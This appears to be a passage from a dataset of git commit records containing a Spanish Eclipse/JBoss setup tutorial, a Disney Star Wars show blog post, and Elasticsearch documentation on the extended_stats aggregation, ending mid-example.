simple podemos apreciar aqu\u00ed la potencia de Maven. S\u00ed observamos el comando vemos que hemos ejecutado dos phases y un goal. La primera fase, `clean`, elimina cualquier fichero creado en un ciclo de construcci\u00f3n anterior, la segunda ejecuta todas las fases de ciclo por defecto, incluida la fase `install`, que crea una versi\u00f3n snapshot en nuestro repositorio local. Finalmente el goal `deploy` del plugin de Red Hat `jboss-as` toma el artefacto instalable de la carpeta `target\\` dentro de la carpeta del proyecto y lo despliega en el servidor.\n\nAbrimos un navegador y vamos a la direcci\u00f3n `http:\/\/localhost:8080\/jboss-helloworld` y si todo ha ido bien veremos el conocido mensaje `Hello World!`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig050.png[]\n\n\u00bfY para desinstalar la aplicaci\u00f3n? Otra \u00fanica linea de comando: `mvn jboss-as:undeploy`. Refrescamos la ventana del navegador para ver el error 404 de recurso no disponible. \n\nEl plugin `jboss-as` es capaz de gestionar desde Maven cualquier operaci\u00f3n contra el servidor JBoss. Para usarlo sobre un proyecto como acabamos de hacer s\u00f3lo es necesario declararlo en la secci\u00f3n `<build>` del fichero `pom.xml`. Otra alternativa es incluir el goal de despliegue en la phase final del ciclo por defecto, la fase install, en el fichero pom.xml, y ejecutar entonces el comando mvn clean install, que ahora s\u00f3lo hace referencia a las dos fases. En el fichero pom.xml tendr\u00edamos que tener lo siguiente:\n\n[source,xml]\n----\n<project>\n ...\n <build>\n ...\n <plugins>\n ...\n <plugin>\n <groupId>org.jboss.as.plugins<\/groupId>\n <artifactId>jboss-as-maven-plugin<\/artifactId>\n <version>7.7.Final<\/version>\n <executions>\n <execution>\n <phase>install<\/phase>\n <goals>\n <goal>deploy<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n ...\n <\/plugins>\n ...\n <\/build>\n...\n<\/project>\n----\n\nParemos el servidor. Como fue arrancado desde una consola de comandos lo paramos cerr\u00e1ndola. Nos vamos a la ventana de la consola y pulsamos `Ctrl + C`. 
Escribimos `S` si nos pregunta si queremos finalizar el archivo por lotes y escribimos `exit` para cerrar la ventana.\n\nVamos ahora a reemplazar la ventana de comando por nuestro IDE para cargar el proyecto y probarlo. Abrimos Eclipse. Una vez dentro del IDE lo primero que hacemos es asegurarnos de que el JRE que se usar\u00e1 sea el contenido en el JDK instalado y no un JRE p\u00fablico fuera del JDK. Esto es necesario porque Eclipse necesita un JDK, como cualquier herrmienta de desarrollo de este tipo, y no le basta s\u00f3lo con un JRE. Me voy a `Windows > Preferences > Java > Installed JREs` y si el JRE no es el incluido en el JDK lo borramos, a\u00f1adimos el incluido en el JDK y lo marcamos como JRE por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig051.png[]\n\nNOTE: Si vamos a experimentar con los ejemplos del servidor en Eclipse es aconsejable comprimir antes la carpeta raiz que los contiene y tener as\u00ed una copia de seguridad que nos permita recuperar el contenido de los ficheros originales cuando lo necesitemos.\n\nEl siguiente paso es importar el proyecto a Eclipse. Me voy a `File > Import > Maven > Existing Maven Projects`. Click en `Next` y luego en `Browse...` localizamos la carpeta del proyecto en `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.En el recuadro `Projects` se seleccionar\u00e1 autom\u00e1ticamente el fichero POM del proyecto. Pulsamos en `Finish` y se nos pregunta si deseamos que nos muestre el cheatsheet que es el conjunto de notas del proyecto, si contestamos afirmativamente luego podemos cerrarlas.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig052.png[]\n\nArrancamos de nuevo el servidor de forma manual desde la ventana de comandos como hicimos antes. Para desplegar el ejemplo importado en el servidor pulsamos bot\u00f3n derecho sobre el proyecto y `Run As\u2026 > Run Configurations > Maven Build`, y creamos una nueva configuraci\u00f3n de arranque rellenando el campo `Goals` con `clean install jboss-as:deploy`. Pulsamos el bot\u00f3n `Apply` y a continuaci\u00f3n el bot\u00f3n `Run` para que Maven realice el ciclo. En la ventana _Consola_ de Eclipse se puede observar la salida de texto del plugin de Maven durante la ejecuci\u00f3n del ciclo de construcci\u00f3n. \n\nComo antes para comprobar que la aplicaci\u00f3n ha sido desplegada de nuevo vamos al navegador y escribimos la URL `http:\/\/localhost:8080\/jboss-helloworld`.\n\nObservemos como se muestra nuestro proyecto dentro de Eclipse. En la perspectiva inicial por defecto mostrada vemos la estructura del proyecto en un recuadro a la izquierda de la pantalla. Aqu\u00ed podemos usar tres views de Eclipse diferentes: Package Explorer, Project Explorer y Navigator. Esta \u00faltima nos presenta la estructura de directorios del proyecto sin m\u00e1s aderezos y en ocasiones es m\u00e1s limpia y clara. En las otras dos Eclipse aporta informaci\u00f3n adicional en forma de iconos y carpetas extra.\n\nVayamos a la view Package Explorer o a la Proyect Explorer, si no est\u00e1 abierta lo hacemos en `Window > Show Wiew > Other...`, probablemente observaremos que sobre el icono del proyecto hay un icono de Warning. Vayamos a la pesta\u00f1a `Problems` en la parte inferior de la pantalla para ver a que se debe esto.\n\n\n","old_contents":"= Empezando por el principio. Nuestro banco de trabajo. 
(2\/2)\nLa metaweb\n:hp-tags: Eclipse, JBoss, JBoss Tools\n:published_at: 2015-04-15\n\nEn esta segunda entrada terminaremos de instalar y configurar el software que nos permitir\u00e1 en adelante construir nuestras propias aplicaciones Java EE. Como IDE optamos por Eclipse, por ser el m\u00e1s extendido. El salto de uno a otro IDE no es algo costoso, ni en tiempo de aprendizaje ni en tiempo de adaptaci\u00f3n del proyecto si los gestionamos bajo Maven o Gradle.\n\nUn IDE debe procurar al desarrollador un entorno que le permita ser lo m\u00e1s productivo posible, ocultando la complejidad de las tecnolog\u00edas empleadas tras el c\u00f3digo fuente generado para resolver las tareas de los documentos de dise\u00f1o del proyecto. Un ejemplo lo tenemos cuando creamos un web service, aqu\u00ed el IDE nos generar\u00e1 todas las clases y ficheros necesarios y nosotros s\u00f3lo tendremos que enfocarnos en definir la API e implementar cada operaci\u00f3n.\n\nEn mi experiencia Netbeans es un buen entorno, con muchas ayudas, y maduro en su versi\u00f3n en su versi\u00f3n 8, adem\u00e1s tiene detr\u00e1s a una gran comunidad y a Oracle. Como dato en contra, durante el desarrollo de un proyecto mediano, en la versi\u00f3n 8.0, de cuando en cuando se quedaba \"pensando\" unos segundos. Por otro lado tenemos a JDeveloper, que es el IDE oficial de Oracle, muy potente y una opci\u00f3n recomendable para nuevos proyectos de gran tama\u00f1o, y si desarrollamos contra Oracle, y\/o el servidor Weblogic. Para proyectos Spring est\u00e1 Eclipse STS que ofrece potentes wizards. Si nuestro servidor es JBoss o el nuevo WildFly podemos optar la soluci\u00f3n adoptada aqu\u00ed, Eclipse + JBoss Tools, o directamente por JBoss Developer Studio. La ventaja de optar por Eclipse es que podemos personalizar nuestro entorno instalando los plugins que elijamos. En definitiva tenemos m\u00faltiples opciones y la decisi\u00f3n muchas veces depender\u00e1 de las tecnolog\u00edas que elijamos o nos imponga el tipo de proyecto o el propio cliente.\n\nOk, antes de nada vamos a crear una sencilla estructura de carpetas donde ir guardardo el trabajo, y donde instalar el software. Por ejemplo la siguiente:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig009.png[]\n\nBajo la carpeta `TALLER` creamos las siguientes:\n\n* `BD`: Para las bases de datos que vayamos instalando: MySQL, Derby, etc.\n* `IDE`: Para la instalaci\u00f3n del IDE Eclipse. Instalad otros si quer\u00e9is echarles un vistazo.\n* `Servidor`: Aqu\u00ed ir\u00e1 nuestro JBoss EAP edici\u00f3n Comunity. Aunque si en el futuro vemos algo particular de Java EE 7 instalaremos WildFly o GlassFish. \n* `Workspace`: Para guardar los proyectos desarrollados en Eclipse.\n\nEl fichero comprimido es simplemente una forma r\u00e1pida de hacer una copia de seguridad del workspace.\n\nPara instalar Eclipse, os aconsejo de nuevo que lo hag\u00e1is en Ingl\u00e9s, vamos a la p\u00e1gina https:\/\/www.eclipse.org\/downloads\/ y elegimos la instalaci\u00f3n para desarrolladores de Java EE.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig010.png[]\n\nBajamos el fichero `.zip`, lo copiamos en la carpeta `c:\\TALLER\\IDE\\` y seleccionamos Extraer aqu\u00ed, no hay programa de instalaci\u00f3n. Entramos en la carpeta de Eclipse y doble click en `eclipse.exe`. Seleccionamos la carpeta `c:\\TALLER\\workspace\\` como espacio de trabajo. 
El IDE se carga y cerramos la pantalla inicial de bienvenida pulsando en el icono en la esquina arriba a la derecha.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig015.png[]\n\nNOTE: No marqu\u00e9is el check `Use this as the default and do not ask again` para as\u00ed cambiar el workspace si quer\u00e9is en un futuro. Si lo marc\u00e1is pod\u00e9is volver a ver la pantalla de selecci\u00f3n de la carpeta del workspace configur\u00e1ndolo en `Window > Preferences > General > Startup and Shutdown > Workspaces`.\n\nAhora le toca al servidor. Nuestro entorno de trabajo necesita un servidor completo para depurar el c\u00f3digo que estemos desarrollando. Navegamos a la p\u00e1gina oficial del servidor JBoss en http:\/\/www.redhat.com\/en\/technologies\/jboss-middleware\/application-platform y pulsamos el bot\u00f3n `TRY IT NOW` dentro de la pesta\u00f1a `TRY`, seleccionada por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig020.png[]\n\nEsto nos lleva a la p\u00e1gina del servidor JBoss para desarrolladores.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig022.png[]\n\nElegimos nuestro sistema operativo y pulsamos sobre el enlace del installer. Si no estamos ya logados saltaremos a la p\u00e1gina de introducci\u00f3n de usuario y contrse\u00f1a. Procedemos a la creaci\u00f3n de una cuenta pulsando el enlace `Create Account`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig025.png[]\n\nDespu\u00e9s de introducir una serie de datos b\u00e1sicos aceptamos los t\u00e9rminos del Programa de Desarrollador de Jboss. Esperamos a que la bajada del fichero acabe. Copiamos el fichero en la carpeta `C:\\TALLER\\Servidor\\` y lo arrancamos escribiendo el comando `java -jar jboss-eap-6.3.0-installer.jar`.\n\nSe iniciar\u00e1 un sencillo wizard de instalaci\u00f3n. Si os aparece un mensaje acerca del Firewall de Windows elegid la opci\u00f3n `Permitir`. A la hora de elegir la carpeta de instalaci\u00f3n seleccionad como antes, `C:\\TALLER\\Servidor\\`. Escribimos luego un nombre de usuario y una contrase\u00f1a. Estas credenciales son las del usuario administrador del servidor, que lo gestionar\u00e1 a trav\u00e9s del navegador usando la Consola de Administraci\u00f3n. Apuntad en un sitio seguro estos datos para no olvidarlos. En la instalaci\u00f3n de este servidor se eligieron las credenciales:\n\n[cols=\"1h,2\", width=\"40\"]\n|===\n|user\n|admin\n\n|password\n|abcd-1234\n|===\n\nEs interesante instalar tambi\u00e9n los ejemplos que trae el servidor. Son varios proyectos Maven que muestran ejemplos sencillos sobre el uso de las diferentes tecnolog\u00edas Java EE incidiendo en las gestionadas desde Red Hat: JPA (Hibernate), CDI (Weld), EJB, JSF, etc. Si abrimos el `pom.xml` de alguno de estos proyectos veremos como se definen de las dependencias en proyectos que se despliegan en el servidor JBoss.\n\nEl wizard contin\u00faa por una serie de pantallas donde dejamos las opciones por defecto, la instalaci\u00f3n finaliza a los pocos segundos. Y ya tenemos instalado un flamante servidor Java EE 6 en local. 
Podemos finalmente guardar y echar un vistazo al script de instalaci\u00f3n.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig030.png[]\n\nComprobaremos que la instalaci\u00f3n es correcta desplegando la aplicaci\u00f3n web _Hello World!_ localizada en los ejemplos reci\u00e9n instalados. Para arrancar manualmente el servidor abrimos una consola de comandos, vamos a la carpeta `bin\\` dentro de la carpeta del servidor y lo iniciamos escribiendo `standalone.bat`. Es importante no cerrar la ventana de comandos ya que si lo hacemos el proceso en que se ejectuta el servidor se terminar\u00e1 y \u00e9ste se parar\u00e1. As\u00ed que dejamos la ventana de comandos abierta, aunque s\u00ed podemos minimizarla.\n\nNOTE: Si antes no instalaste los ejemplos del servidor puedes bajarlos ahora en el enlace https:\/\/github.com\/jboss-developer\/jboss-eap-quickstarts\/archive\/6.3.0.GA.zip[jboss-eap-quickstarts-6.3.0.GA.zip]. Otra alternativa es obtener la aplicaci\u00f3n desde Maven a partir del arquetipo `maven-archetype-site-simple`. Puedes consultar el Post anterior para recordar c\u00f3mo lo hicimos.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig035.png[]\n\nAhora abrimos otra consola de comandos y situamos en la carpeta del proyecto web helloworld `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig040.png[]\n\nDentro de la carpeta del proyecto Maven escribimos el comando `mvn clean install jboss-as:deploy`. Se inicia la bajada de los artefactos de dependencias y plugins necesarios y finalmente el comando se ejecuta. Con una sola l\u00ednea de comando hemos llevado a cabo todo el ciclo de construcci\u00f3n del proyecto incluyendo el despliegue de la aplicaci\u00f3n en nuestro reci\u00e9n instalado servidor. A\u00fan con un proyecto tan simple podemos apreciar aqu\u00ed la potencia de Maven. S\u00ed observamos el comando vemos que hemos ejecutado dos phases y un goal. La primera fase, `clean`, elimina cualquier fichero creado en un ciclo de construcci\u00f3n anterior, la segunda ejecuta todas las fases de ciclo por defecto, incluida la fase `install`, que crea una versi\u00f3n snapshot en nuestro repositorio local. Finalmente el goal `deploy` del plugin de Red Hat `jboss-as` toma el artefacto instalable de la carpeta `target\\` dentro de la carpeta del proyecto y lo despliega en el servidor.\n\nAbrimos un navegador y vamos a la direcci\u00f3n `http:\/\/localhost:8080\/jboss-helloworld` y si todo ha ido bien veremos el conocido mensaje `Hello World!`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig050.png[]\n\n\u00bfY para desinstalar la aplicaci\u00f3n? Otra \u00fanica linea de comando: `mvn jboss-as:undeploy`. Refrescamos la ventana del navegador para ver el error 404 de recurso no disponible. \n\nEl plugin `jboss-as` es capaz de gestionar desde Maven cualquier operaci\u00f3n contra el servidor JBoss. Para usarlo sobre un proyecto como acabamos de hacer s\u00f3lo es necesario declararlo en la secci\u00f3n `<build>` del fichero `pom.xml`. Otra alternativa es incluir el goal de despliegue en la phase final del ciclo por defecto, la fase install, en el fichero pom.xml, y ejecutar entonces el comando mvn clean install, que ahora s\u00f3lo hace referencia a las dos fases. 
En el fichero pom.xml tendr\u00edamos que tener lo siguiente:\n\n[source,xml]\n----\n<project>\n ...\n <build>\n ...\n <plugins>\n ...\n <plugin>\n <groupId>org.jboss.as.plugins<\/groupId>\n <artifactId>jboss-as-maven-plugin<\/artifactId>\n <version>7.7.Final<\/version>\n <executions>\n <execution>\n <phase>install<\/phase>\n <goals>\n <goal>deploy<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n ...\n <\/plugins>\n ...\n <\/build>\n...\n<\/project>\n----\n\nParamos ahora el servidor de manera manual. Como ha sido iniciado desde una consola de comandos lo que hacemos es cerrarla. Nos vamos a la consola y pulsamos Ctrl + C. Respondemos S si nos pregunta si queremos finalizar el archivo por lotes (el bat) y escribimos exit para que la ventana se cierre.\n\nHagamos ahora lo mismo desde Eclipse. Abrimos Eclipse y aceptamos la carpeta para el espacio de trabajo. No marques el check en esta ventana porque no es infrecuente cambiar la localizaci\u00f3n del workspace.\n\nLo primero que hacemos es asegurarnos de que el JRE que Java va a usar es el contenido en el JDK que ya instalamos y no un JRE p\u00fablico fuera del JDK. Esto es necesario porque Eclipse necesita un JDK como cualquier herrmienta de desarrollo de este tipo y no le basta con un JRE o m\u00e1quina virtual de Java. Me voy a Windows > Preferences > Java > Installed JREs y si el JRE no es el incluido en el JDK lo borramos, a\u00f1adimos el incluido en el JDK y lo marcamos como JRE por defecto.\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"471855cf226f8ef22987259c3e67fcf961779367","subject":"Update 2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","message":"Update 2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","new_file":"_posts\/2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","new_contents":"= Star Wars Stage Show and New Fireworks coming to Hollywood Studios\n:hp-tags: Disney World, Hollywood Studios, Star Wars\n:published_at: 2016-02-19\n\nThere's been an awakening. Have you felt it?\n\nDisney's Hollywood Studios is about to awaken with all new Star Wars experiences! The https:\/\/disneyparks.disney.go.com\/blog\/2016\/02\/new-star-wars-nighttime-spectacular-announced-set-to-make-theme-park-history\/[Disney Parks Blog] is reporting that starting April 4th, a new Star Wars stage show named \"_Star Wars: A Galaxy Far, Far Away_\" will debut at center stage in Disney's Hollywood Studios. That same day, Captain Phasma (from _The Force Awakens_) will lead several First Order stormtroopers on a march from the Star Wars Launch Bay to center stage.\n\nThen later this summer, a new Star Wars fireworks show, \"_Star Wars: A Galactic Spectacular_\" will be shown nightly, combining fireworks, special effects, and video projection on the Chinese Theater. The show will include a tower of fire and spotlight beams that form lightsabers in the sky.\n\nHaving seen the amazing Star Wars-themed \"_Symphony in the Stars_\", both at Star Wars Weekends and the newer incarnation of the show that debuted in December, I can only imagine that the new show will be nothing short of jaw-dropping. 
And having seen the Star Wars segment of _World of Color_ in Disney California Adventure, I imagine the tower of fire being much like the huge fireballs shot during that show. This should be incredible!\n\nWhat do you think of all of the Star Wars experiences that Disney is offering in Disney's Hollywood Studios in advance of the new Star Wars Land to be opened in a few years? Leave a comment and let's discuss!","old_contents":"= Star Wars Stage Show and New Fireworks coming to Hollywood Studios\n:hp-tags: Disney World, Hollywood Studios, Star Wars\n:published_at: 2016-02-19\n\nThere's been an awakening. Have you felt it?\n\nDisney's Hollywood Studios is about to awaken with all new Star Wars experiences! The https:\/\/disneyparks.disney.go.com\/blog\/2016\/02\/new-star-wars-nighttime-spectacular-announced-set-to-make-theme-park-history\/[Disney Parks Blog] is reporting that starting April 4th, a new Star Wars stage show named \"_Star Wars: A Galaxy Far, Far Away_\" will debut at center stage in Disney's Hollywood Studios. That same day, Captain Phasma (from _The Force Awakens_) will lead several First Order stormtroopers on a march from the Star Wars Launch Bay to center stage.\n\nThen later this summer, a new Star Wars fireworks show, \"_Star Wars: A Galactic Spectacular_\" will be shown nightly, combining fireworks, special effects, and video projection on the Chinese Theater. The show will include a tower of fire and spotlight beams that form lightsabers in the sky.\n\nHaving seen the amazing Star Wars-themed \"_Symphony in the Stars_\", both at Star Wars Weekends and the newer incarnation of the show that debuted in December, I can only imagine that the new show will be nothing short of jaw-dropping. And having seen the Star Wars segment of _World of Color_ in Disney California Adventure, I imagine the tower of fire being much like the huge fireballs shot during that show. This should be awesome!\n\nWhat do you think of all of the Star Wars experiences that Disney is offering in Disney's Hollywood Studios in advance of the new Star Wars Land to be opened in a few years? 
Leave a comment and let's discuss!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"6fadeeca566b07b86f1de26f449fab6a96541037","subject":"Updated doc annotations for 1.4.3","message":"Updated doc annotations for 1.4.3\n","repos":"Helen-Zhao\/elasticsearch,pritishppai\/elasticsearch,jprante\/elasticsearch,infusionsoft\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,kunallimaye\/elasticsearch,kalimatas\/elasticsearch,cnfire\/elasticsearch-1,franklanganke\/elasticsearch,linglaiyao1314\/elasticsearch,truemped\/elasticsearch,jchampion\/elasticsearch,Rygbee\/elasticsearch,jw0201\/elastic,GlenRSmith\/elasticsearch,JSCooke\/elasticsearch,hanswang\/elasticsearch,humandb\/elasticsearch,jpountz\/elasticsearch,javachengwc\/elasticsearch,pranavraman\/elasticsearch,kenshin233\/elasticsearch,Shekharrajak\/elasticsearch,vingupta3\/elasticsearch,camilojd\/elasticsearch,PhaedrusTheGreek\/elasticsearch,rmuir\/elasticsearch,bestwpw\/elasticsearch,sreeramjayan\/elasticsearch,wayeast\/elasticsearch,s1monw\/elasticsearch,wittyameta\/elasticsearch,winstonewert\/elasticsearch,StefanGor\/elasticsearch,yongminxia\/elasticsearch,JSCooke\/elasticsearch,chirilo\/elasticsearch,nrkkalyan\/elasticsearch,schonfeld\/elasticsearch,acchen97\/elasticsearch,petabytedata\/elasticsearch,vietlq\/elasticsearch,himanshuag\/elasticsearch,PhaedrusTheGreek\/elasticsearch,sreeramjayan\/elasticsearch,alexbrasetvik\/elasticsearch,Flipkart\/elasticsearch,slavau\/elasticsearch,MichaelLiZhou\/elasticsearch,kevinkluge\/elasticsearch,Ansh90\/elasticsearch,tsohil\/elasticsearch,Rygbee\/elasticsearch,fernandozhu\/elasticsearch,lightslife\/elasticsearch,mikemccand\/elasticsearch,hechunwen\/elasticsearch,truemped\/elasticsearch,kcompher\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,apepper\/elasticsearch,wittyameta\/elasticsearch,polyfractal\/elasticsearch,djschny\/elasticsearch,yongminxia\/elasticsearch,luiseduardohdbackup\/elasticsearch,mmaracic\/elasticsearch,Kakakakakku\/elasticsearch,andrestc\/elasticsearch,wbowling\/elasticsearch,sreeramjayan\/elasticsearch,EasonYi\/elasticsearch,davidvgalbraith\/elasticsearch,YosuaMichael\/elasticsearch,qwerty4030\/elasticsearch,mbrukman\/elasticsearch,franklanganke\/elasticsearch,xingguang2013\/elasticsearch,rlugojr\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,acchen97\/elasticsearch,MjAbuz\/elasticsearch,pranavraman\/elasticsearch,khiraiwa\/elasticsearch,likaiwalkman\/elasticsearch,dongjoon-hyun\/elasticsearch,easonC\/elasticsearch,jw0201\/elastic,vvcephei\/elasticsearch,wayeast\/elasticsearch,masterweb121\/elasticsearch,jbertouch\/elasticsearch,slavau\/elasticsearch,LeoYao\/elasticsearch,gmarz\/elasticsearch,knight1128\/elasticsearch,mjason3\/elasticsearch,ESamir\/elasticsearch,clintongormley\/elasticsearch,nilabhsagar\/elasticsearch,iacdingping\/elasticsearch,NBSW\/elasticsearch,JackyMai\/elasticsearch,hydro2k\/elasticsearch,dataduke\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,MetSystem\/elasticsearch,strapdata\/elassandra-test,dylan8902\/elasticsearch,AndreKR\/elasticsearch,easonC\/elasticsearch,Charlesdong\/elasticsearch,JackyMai\/elasticsearch,caengcjd\/elasticsearch,wayeast\/elasticsearch,tahaemin\/elasticsearch,Kakakakakku\/elasticsearch,Brijeshrpatel9\/elasticsearch,huanzhong\/elasticsearch,zhiqinghuang\/elasticsearch,sc0ttkclark\/elasticsearch,sdauletau\/elasticsearch,kevinkluge\/elasticsearch,mikemccand\/elasticsearch,socialrank\/elasticsearch,huanzhong\/elasticsearch,hydro2k\/elasticsearch,winstonewert\/elasticsearc
h,Brijeshrpatel9\/elasticsearch,jimhooker2002\/elasticsearch,hafkensite\/elasticsearch,girirajsharma\/elasticsearch,xingguang2013\/elasticsearch,onegambler\/elasticsearch,dylan8902\/elasticsearch,C-Bish\/elasticsearch,pranavraman\/elasticsearch,diendt\/elasticsearch,HarishAtGitHub\/elasticsearch,ESamir\/elasticsearch,Uiho\/elasticsearch,IanvsPoplicola\/elasticsearch,JervyShi\/elasticsearch,fekaputra\/elasticsearch,jeteve\/elasticsearch,apepper\/elasticsearch,rhoml\/elasticsearch,lchennup\/elasticsearch,strapdata\/elassandra,szroland\/elasticsearch,i-am-Nathan\/elasticsearch,iacdingping\/elasticsearch,wangtuo\/elasticsearch,awislowski\/elasticsearch,obourgain\/elasticsearch,JackyMai\/elasticsearch,bawse\/elasticsearch,MetSystem\/elasticsearch,achow\/elasticsearch,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,wittyameta\/elasticsearch,aglne\/elasticsearch,sc0ttkclark\/elasticsearch,MjAbuz\/elasticsearch,Shepard1212\/elasticsearch,huanzhong\/elasticsearch,ThalaivaStars\/OrgRepo1,xpandan\/elasticsearch,coding0011\/elasticsearch,nomoa\/elasticsearch,jw0201\/elastic,javachengwc\/elasticsearch,sauravmondallive\/elasticsearch,vroyer\/elasticassandra,Helen-Zhao\/elasticsearch,mgalushka\/elasticsearch,zhiqinghuang\/elasticsearch,HarishAtGitHub\/elasticsearch,IanvsPoplicola\/elasticsearch,kevinkluge\/elasticsearch,andrejserafim\/elasticsearch,truemped\/elasticsearch,s1monw\/elasticsearch,amaliujia\/elasticsearch,nellicus\/elasticsearch,yanjunh\/elasticsearch,SergVro\/elasticsearch,strapdata\/elassandra5-rc,scottsom\/elasticsearch,alexkuk\/elasticsearch,jimhooker2002\/elasticsearch,MetSystem\/elasticsearch,wbowling\/elasticsearch,nazarewk\/elasticsearch,Collaborne\/elasticsearch,koxa29\/elasticsearch,elancom\/elasticsearch,javachengwc\/elasticsearch,skearns64\/elasticsearch,mapr\/elasticsearch,diendt\/elasticsearch,franklanganke\/elasticsearch,ivansun1010\/elasticsearch,chirilo\/elasticsearch,chirilo\/elasticsearch,slavau\/elasticsearch,dylan8902\/elasticsearch,alexshadow007\/elasticsearch,davidvgalbraith\/elasticsearch,Brijeshrpatel9\/elasticsearch,nellicus\/elasticsearch,rento19962\/elasticsearch,jeteve\/elasticsearch,nezirus\/elasticsearch,btiernay\/elasticsearch,achow\/elasticsearch,vrkansagara\/elasticsearch,socialrank\/elasticsearch,sjohnr\/elasticsearch,karthikjaps\/elasticsearch,nilabhsagar\/elasticsearch,mnylen\/elasticsearch,ivansun1010\/elasticsearch,szroland\/elasticsearch,MichaelLiZhou\/elasticsearch,jaynblue\/elasticsearch,schonfeld\/elasticsearch,markharwood\/elasticsearch,Chhunlong\/elasticsearch,IanvsPoplicola\/elasticsearch,codebunt\/elasticsearch,codebunt\/elasticsearch,Chhunlong\/elasticsearch,rento19962\/elasticsearch,Shepard1212\/elasticsearch,golubev\/elasticsearch,linglaiyao1314\/elasticsearch,dpursehouse\/elasticsearch,areek\/elasticsearch,sreeramjayan\/elasticsearch,likaiwalkman\/elasticsearch,kimimj\/elasticsearch,brandonkearby\/elasticsearch,MaineC\/elasticsearch,codebunt\/elasticsearch,andrejserafim\/elasticsearch,palecur\/elasticsearch,mnylen\/elasticsearch,xingguang2013\/elasticsearch,kaneshin\/elasticsearch,sarwarbhuiyan\/elasticsearch,schonfeld\/elasticsearch,beiske\/elasticsearch,Flipkart\/elasticsearch,AshishThakur\/elasticsearch,mgalushka\/elasticsearch,polyfractal\/elasticsearch,kenshin233\/elasticsearch,sposam\/elasticsearch,petabytedata\/elasticsearch,F0lha\/elasticsearch,btiernay\/elasticsearch,queirozfcom\/elasticsearch,mute\/elasticsearch,EasonYi\/elasticsearch,dongjoon-hyun\/elasticsearch,mute\/elasticsearch,martinstuga\/elasticsearch,sjohnr\/elast
[[search-aggregations-metrics-extendedstats-aggregation]]
=== Extended Stats Aggregation

A `multi-value` metrics aggregation that computes stats over numeric values extracted from the aggregated documents. These values can be extracted either from specific numeric fields in the documents, or be generated by a provided script.

The `extended_stats` aggregation is an extended version of the <<search-aggregations-metrics-stats-aggregation,`stats`>> aggregation, where additional metrics are added such as `sum_of_squares`, `variance`, `std_deviation` and `std_deviation_bounds`.

Assuming the data consists of documents representing exam grades (between 0 and 100) of students:

[source,js]
--------------------------------------------------
{
    "aggs" : {
        "grades_stats" : { "extended_stats" : { "field" : "grade" } }
    }
}
--------------------------------------------------

The above aggregation computes the grades statistics over all documents. The aggregation type is `extended_stats` and the `field` setting defines the numeric field of the documents the stats will be computed on. The above will return the following:

[source,js]
--------------------------------------------------
{
    ...

    "aggregations": {
        "grades_stats": {
            "count": 9,
            "min": 72,
            "max": 99,
            "avg": 86,
            "sum": 774,
            "sum_of_squares": 67028,
            "variance": 51.55555555555556,
            "std_deviation": 7.180219742846005,
            "std_deviation_bounds": {
                "upper": 100.36043948569201,
                "lower": 71.63956051430799
            }
        }
    }
}
--------------------------------------------------

The name of the aggregation (`grades_stats` above) also serves as the key by which the aggregation result can be retrieved from the returned response.

==== Standard Deviation Bounds
added[1.4.3]

By default, the `extended_stats` metric will return an object called `std_deviation_bounds`, which provides an interval of plus/minus two standard deviations from the mean. This can be a useful way to visualize the variance of your data. If you want a different boundary, for example three standard deviations, you can set `sigma` in the request:

[source,js]
--------------------------------------------------
{
    "aggs" : {
        "grades_stats" : {
            "extended_stats" : {
                "field" : "grade",
                "sigma" : 3 <1>
            }
        }
    }
}
--------------------------------------------------
<1> `sigma` controls how many standard deviations +/- from the mean should be displayed added[1.4.3]

`sigma` can be any non-negative double, meaning you can request non-integer values such as `1.5`. A value of `0` is valid, but will simply return the average for both `upper` and `lower` bounds.
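As a quick sanity check, the bounds in the example response are simply the mean plus or minus `sigma` (default `2`) standard deviations, using the values returned above:

--------------------------------------------------
upper = avg + sigma * std_deviation
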